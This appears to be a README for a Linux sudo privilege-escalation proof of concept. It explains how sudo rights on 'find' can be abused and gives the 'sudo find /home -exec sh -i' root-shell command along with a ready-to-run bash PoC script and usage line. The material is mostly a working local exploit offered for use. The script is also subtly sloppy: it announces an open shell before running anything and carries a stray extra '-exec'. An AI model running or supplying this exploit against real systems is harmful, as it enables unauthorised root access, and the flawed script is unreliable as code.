LINUX PRIVILEGE ESCALATION SUDO COMMAND ============================== What is exploit? ----------------- If the attacker can’t directly get root access via any other techniques, he might try to compromise any of the users who have SUDO access. Once he has access to any of the SUDO users, he can basically execute any commands with root privileges. Administrators might just allow the users to run a few commands through SUDO and not all of them but even with this configuration, they might introduce vulnerabilities unknowingly which can lead to privilege escalation. A classic example of this is assigning SUDO rights to the find command so that another user can search for particular files/logs in the system. While the admin might be unaware that the ‘find’ command contains parameters for command execution, an attacker can execute commands with root privilege. Exploiting misconfigured SUDO rights to get root access $ sudo -l – Prints the commands which we are allowed to run as SUDO We can run find, cat and python as SUDO. These all commands will run as root when run with SUDO. If we can somehow escape to the shell through any of these commands, we can get root access. $ sudo find /home -exec sh -i \; – find command’s exec parameter can be used for arbitrary code execution. POC CODE ------------ #!/bin/bash if command -v sudo &> /dev/null; then echo echo "SUDO PRIVILEGE ESCALATION" echo echo "Coded By Anezatra" echo echo "[*] Process ready" echo "[*] Executing command ..." echo "[+] Shell is opened!" echo else echo echo "[-] Error: 'sudo' command not found. Not vulnerable." exit 1 fi sudo find /home -exec sh -i \; -exec {} \; if [ $? -ne 0 ]; then echo echo "[-] Error: The find command encountered an issue." fi USAGE -------- bash poc.sh